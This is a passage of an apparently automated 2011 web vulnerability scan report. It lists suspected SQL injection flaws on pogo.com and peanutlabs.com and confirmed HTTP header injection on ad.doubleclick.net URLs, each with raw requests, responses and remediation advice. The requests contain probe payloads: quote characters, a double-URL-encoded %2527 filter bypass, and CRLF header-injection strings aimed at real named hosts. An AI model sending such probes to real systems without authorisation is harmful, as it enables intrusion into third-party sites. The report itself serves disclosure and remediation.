HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 01:56:53 GMT Server: Apache-Coyote/1.1 Content-Length: 25666 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... reg/signin.do', { method : 'get', data : 'returnType=&returnValue= onSuccess: function(responseText) { var forwardUrl = responseText; window.location = forwardUrl; }, onFailure: function () { alert('Could not log you in'); MootoolsUtils.dispose($( } }); } </script> ...[SNIP]... |
Request 2
GET /prize/prize.do Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B |
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Location: http://www.pogo.com/login Content-Type: text/html;charset=UTF-8 Content-Length: 0 Date: Sun, 09 Jan 2011 01:56:54 GMT Server: Apache-Coyote/1.1 |
1.25. http://www.pogo.com/prize/prize.do [op600clubpogoliid cookie] previous next
Summary
Severity: | High |
Confidence: | Tentative |
Host: | http://www.pogo.com |
Path: | /prize/prize.do |
Issue detail
The op600clubpogoliid cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the op600clubpogoliid cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.Request 1
GET /prize/prize.do Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B |
Response 1
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 01:56:03 GMT Server: Apache-Coyote/1.1 Content-Length: 25548 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... reg/signin.do', { method : 'get', data : 'returnType=&returnValue= onSuccess: function(responseText) { var forwardUrl = responseText; window.location = forwardUrl; }, onFailure: function () { alert('Could not log you in'); MootoolsUtils.dispose($( } }); } </script> ...[SNIP]... |
Request 2
GET /prize/prize.do Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B |
Response 2
HTTP/1.1 302 Moved Temporarily Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Location: http://www.pogo.com/login Content-Type: text/html;charset=UTF-8 Content-Length: 0 Date: Sun, 09 Jan 2011 01:56:03 GMT Server: Apache-Coyote/1.1 |
1.26. http://www1.peanutlabs.com/peanut-labs-acquired-by-online-research-company-e-rewards-2/ [PHPSESSID cookie] previous next
Summary
Severity: | High |
Confidence: | Tentative |
Host: | http://www1.peanutlabs |
Path: | /peanut-labs-acquired-by |
Issue detail
The PHPSESSID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the PHPSESSID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the PHPSESSID cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.Request 1
GET /peanut-labs-acquired-by Host: www1.peanutlabs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: pl_user_id=d41d8cd98f |
Response 1
HTTP/1.1 500 Internal Server Error Date: Sun, 09 Jan 2011 07:24:43 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.5 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sun, 09 Jan 2011 07:24:43 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 369 Connection: close Content-Type: text/html; charset=utf-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Conte ...[SNIP]... |
Request 2
GET /peanut-labs-acquired-by Host: www1.peanutlabs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: pl_user_id=d41d8cd98f |
Response 2
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 07:24:43 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.5 X-Pingback: http://www1.peanutlabs Link: <http://www1.peanutlabs Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29570 <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Peanut Labs | Peanut Labs Acquired By E-Rewards ...[SNIP]... |
1.27. http://www1.peanutlabs.com/wp-content/plugins/contact-form-7/scripts.js [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Tentative |
Host: | http://www1.peanutlabs |
Path: | /wp-content/plugins |
Issue detail
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.Request 1
GET /wp-content/plugins Host: www1.peanutlabs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: pl_user_id=d41d8cd98f |
Response 1
HTTP/1.1 500 Internal Server Error Date: Sun, 09 Jan 2011 07:24:33 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.5 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sun, 09 Jan 2011 07:24:33 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 369 Connection: close Content-Type: text/html; charset=utf-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Conte ...[SNIP]... |
Request 2
GET /wp-content/plugins Host: www1.peanutlabs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: pl_user_id=d41d8cd98f |
Response 2
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 07:24:33 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.5 X-Pingback: http://www1.peanutlabs Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sun, 09 Jan 2011 07:24:34 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 40811 <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Peanut Labs | Page not found</title> <!-- ST ...[SNIP]... |
1.28. http://www1.peanutlabs.com/xmlrpc.php [User-Agent HTTP header] previous next
Summary
Severity: | High |
Confidence: | Tentative |
Host: | http://www1.peanutlabs |
Path: | /xmlrpc.php |
Issue detail
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.Request 1
GET /xmlrpc.php HTTP/1.1 Host: www1.peanutlabs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527 Connection: close Cookie: pl_user_id=d41d8cd98f |
Response 1
HTTP/1.1 500 Internal Server Error Date: Sun, 09 Jan 2011 07:24:40 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.5 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sun, 09 Jan 2011 07:24:40 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 369 Connection: close Content-Type: text/html; charset=utf-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Conte ...[SNIP]... |
Request 2
GET /xmlrpc.php HTTP/1.1 Host: www1.peanutlabs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527 Connection: close Cookie: pl_user_id=d41d8cd98f |
Response 2
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 07:24:40 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.5 Vary: Accept-Encoding Content-Length: 42 Connection: close Content-Type: text/plain XML-RPC server accepts POST requests only. |
2. HTTP header injection previous next
There are 29 instances of this issue:
- http://ad.doubleclick.net/ad/N6271.148484
.FRONTLINEDIRECTINC. /B4796131.29 [REST URL parameter 1] - http://ad.doubleclick.net/ad/downloads.pogo
/category [REST URL parameter 1] - http://ad.doubleclick.net/ad/home.pogo/spotlight [REST URL parameter 1]
- http://ad.doubleclick.net/ad/scrabble.pogo/load [REST URL parameter 1]
- http://ad.doubleclick.net/ad/scrabble.pogo/room [REST URL parameter 1]
- http://ad.doubleclick.net/adi/N5621.148484
.0233710364621/B4682144 [REST URL parameter 1] - http://ad.doubleclick.net/adj/N6457.4298
.ADVERTISING.COM/B4840137 .13 [REST URL parameter 1] - http://ad.doubleclick.net/adj/downloads.pogo
/category [REST URL parameter 1] - http://ad.doubleclick.net/adj/home.pogo/spotlight [REST URL parameter 1]
- http://ad.doubleclick.net/adj/pand.default/prod
.backstage [REST URL parameter 1] - http://ad.doubleclick.net/adj/pand.default/prod
.community [REST URL parameter 1] - http://ad.doubleclick.net/adj/prize.pogo/prizes [REST URL parameter 1]
- http://ad.doubleclick.net/adj/scrabble.pogo/load [REST URL parameter 1]
- http://ad.doubleclick.net/adj/scrabble.pogo/room [REST URL parameter 1]
- http://ad.doubleclick.net/adj/surveys.pogo/misc [REST URL parameter 1]
- http://ad.doubleclick.net/jump/downloads.pogo
/category [REST URL parameter 1] - http://ad.doubleclick.net/jump/home.pogo/spotlight [REST URL parameter 1]
- http://ad.doubleclick.net/jump/prize.pogo/prizes [REST URL parameter 1]
- http://ad.doubleclick.net/jump/scrabble.pogo/load [REST URL parameter 1]
- http://ad.doubleclick.net/jump/scrabble.pogo/room [REST URL parameter 1]
- http://ad.doubleclick.net/jump/surveys.pogo/misc [REST URL parameter 1]
- http://bs.serving-sys.com/BurstingPipe/Banner
Source.asp [eyeblaster cookie] - http://bs.serving-sys.com/BurstingPipe/Bursti
ngInteractionsPipe.asp [eyeblaster cookie] - http://bs.serving-sys.com/BurstingPipe/Bursti
ngInteractionsPipe.asp [flv parameter] - http://bs.serving-sys.com/BurstingPipe/Bursti
ngInteractionsPipe.asp [res parameter] - http://bs.serving-sys.com/BurstingPipe/Bursti
ngInteractionsPipe.asp [wmpv parameter] - http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]
- http://www.salesforce.com/servlet/servlet
.WebToLead [REST URL parameter 2] - https://www.salesforce.com/servlet/servlet
.WebToLead [REST URL parameter 2]
Issue background
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.2.1. http://ad.doubleclick.net/ad/N6271.148484.FRONTLINEDIRECTINC./B4796131.29 [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /ad/N6271.148484 |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 586bb%0d%0a9799c72b680 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.Request
GET /586bb%0d%0a9799c72b680/N6271.148484.FRONTL Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t |
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/586bb 9799c72b680/N6271.148484.FRONTL Date: Sun, 09 Jan 2011 02:03:07 GMT Server: GFE/2.0 Connection: close <h1>Error 302 Moved Temporarily</h1> |
2.2. http://ad.doubleclick.net/ad/downloads.pogo/category [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /ad/downloads.pogo |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 3913f%0d%0a3c0a349169b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.Request
GET /3913f%0d%0a3c0a349169b/downloads.pogo/category HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t |
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/3913f 3c0a349169b/downloads.pogo/category: Date: Sun, 09 Jan 2011 02:03:08 GMT Server: GFE/2.0 Connection: close <h1>Error 302 Moved Temporarily</h1> |
2.3. http://ad.doubleclick.net/ad/home.pogo/spotlight [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /ad/home.pogo/spotlight |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 1e05c%0d%0a76a123a846 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.Request
GET /1e05c%0d%0a76a123a846/home.pogo/spotlight Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t |
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/1e05c 76a123a846/home.pogo/spotlight Date: Sun, 09 Jan 2011 02:03:09 GMT Server: GFE/2.0 Connection: close <h1>Error 302 Moved Temporarily</h1> |
2.4. http://ad.doubleclick.net/ad/scrabble.pogo/load [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /ad/scrabble.pogo/load |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 6a67f%0d%0a245da988542 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.Request
GET /6a67f%0d%0a245da988542/scrabble.pogo/load HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t |
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/6a67f 245da988542/scrabble.pogo/load: Date: Sun, 09 Jan 2011 02:03:14 GMT Server: GFE/2.0 Connection: close <h1>Error 302 Moved Temporarily</h1> |
2.5. http://ad.doubleclick.net/ad/scrabble.pogo/room [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /ad/scrabble.pogo/room |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 6c29f%0d%0a119f9246290 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.Request
GET /6c29f%0d%0a119f9246290/scrabble.pogo/room;dcopt Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t |
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/6c29f 119f9246290/scrabble.pogo/room Date: Sun, 09 Jan 2011 02:03:14 GMT Server: GFE/2.0 Connection: close <h1>Error 302 Moved Temporarily</h1> |
2.6. http://ad.doubleclick.net/adi/N5621.148484.0233710364621/B4682144 [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N5621.148484 |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 5f927%0d%0a372c17095f9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.Request
GET /5f927%0d%0a372c17095f9/N5621.148484.023371 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t |
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/5f927 372c17095f9/N5621.148484.023371 Date: Sun, 09 Jan 2011 02:03:16 GMT Server: GFE/2.0 Connection: close <h1>Error 302 Moved Temporarily</h1> |
2.7. http://ad.doubleclick.net/adj/N6457.4298.ADVERTISING.COM/B4840137.13 [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N6457.4298 |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 2379a%0d%0acb4e6408377 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.Request
GET /2379a%0d%0acb4e6408377/N6457.4298.ADVERTISING Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t |
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/2379a cb4e6408377/N6457.4298.ADVERTISING Date: Sun, 09 Jan 2011 02:03:04 GMT Server: GFE/2.0 Connection: close <h1>Error 302 Moved Temporarily</h1> |
2.8. http://ad.doubleclick.net/adj/downloads.pogo/category [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/downloads.pogo |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 31153%0d%0aafba1dd703b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.Request
GET /31153%0d%0aafba1dd703b/downloads.pogo/category HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t |
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/31153 afba1dd703b/downloads.pogo/category: Date: Sun, 09 Jan 2011 02:02:58 GMT Server: GFE/2.0 Connection: close <h1>Error 302 Moved Temporarily</h1> |
2.9. http://ad.doubleclick.net/adj/home.pogo/spotlight [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/home.pogo/spotlight |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 1329b%0d%0a901e1fb73e9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.Request
GET /1329b%0d%0a901e1fb73e9/home.pogo/spotlight HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t |
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/1329b 901e1fb73e9/home.pogo/spotlight: Date: Sun, 09 Jan 2011 02:02:57 GMT Server: GFE/2.0 Connection: close <h1>Error 302 Moved Temporarily</h1> |
2.10. http://ad.doubleclick.net/adj/pand.default/prod.backstage [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/pand.default/prod |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 1ee0e%0d%0a014a1f82eea was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.Request
GET /1ee0e%0d%0a014a1f82eea/pand.default/prod Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t |
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/1ee0e 014a1f82eea/pand.default/prod Date: Sun, 09 Jan 2011 02:02:52 GMT Server: GFE/2.0 Connection: close <h1>Error 302 Moved Temporarily</h1> |
2.11. http://ad.doubleclick.net/adj/pand.default/prod.community [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/pand.default/prod |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 11083%0d%0a8a9bf6293f5 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.Request
GET /11083%0d%0a8a9bf6293f5/pand.default/prod Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.pandora.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c653243310000d9||t |
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/11083 8a9bf6293f5/pand.default/prod Date: Sun, 09 Jan 2011 02:01:35 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
2.12. http://ad.doubleclick.net/adj/prize.pogo/prizes [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/prize.pogo/prizes |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 31be3%0d%0ad74a84518d3 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.Request
GET /31be3%0d%0ad74a84518d3/prize.pogo/prizes;dcopt Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.pogo.com/prize Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c653243310000d9||t |
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/31be3 d74a84518d3/prize.pogo/prizes Date: Sun, 09 Jan 2011 02:02:08 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
2.13. http://ad.doubleclick.net/adj/scrabble.pogo/load [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/scrabble.pogo/load |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 8b770%0d%0ab65cef34867 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.Request
GET /8b770%0d%0ab65cef34867/scrabble.pogo/load;dcopt Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://game3.pogo.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c653243310000d9||t |
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/8b770 b65cef34867/scrabble.pogo/load Date: Sun, 09 Jan 2011 02:02:16 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
2.14. http://ad.doubleclick.net/adj/scrabble.pogo/room [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/scrabble.pogo/room |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 4a418%0d%0ac5139b784f3 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.Request
GET /4a418%0d%0ac5139b784f3/scrabble.pogo/room HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t |
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/4a418 c5139b784f3/scrabble.pogo/room: Date: Sun, 09 Jan 2011 02:03:01 GMT Server: GFE/2.0 Connection: close <h1>Error 302 Moved Temporarily</h1> |
2.15. http://ad.doubleclick.net/adj/surveys.pogo/misc [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/surveys.pogo/misc |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 12804%0d%0a48b5790cf88 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.Request
GET /12804%0d%0a48b5790cf88/surveys.pogo/misc HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t |
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/12804 48b5790cf88/surveys.pogo/misc: Date: Sun, 09 Jan 2011 02:03:01 GMT Server: GFE/2.0 Connection: close <h1>Error 302 Moved Temporarily</h1> |
2.16. http://ad.doubleclick.net/jump/downloads.pogo/category [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /jump/downloads.pogo |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 13037%0d%0afced369b2cc was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.Request
GET /13037%0d%0afced369b2cc/downloads.pogo/category HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t |
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/13037 fced369b2cc/downloads.pogo/category: Date: Sun, 09 Jan 2011 02:03:24 GMT Server: GFE/2.0 Connection: close <h1>Error 302 Moved Temporarily</h1> |
2.17. http://ad.doubleclick.net/jump/home.pogo/spotlight [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /jump/home.pogo/spotlight |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 556e1%0d%0a2fda3d0e5cf was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.Request
GET /556e1%0d%0a2fda3d0e5cf/home.pogo/spotlight Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t |
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/556e1 2fda3d0e5cf/home.pogo/spotlight Date: Sun, 09 Jan 2011 02:03:25 GMT Server: GFE/2.0 Connection: close <h1>Error 302 Moved Temporarily</h1> |
2.18. http://ad.doubleclick.net/jump/prize.pogo/prizes [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /jump/prize.pogo/prizes |
Issue detail
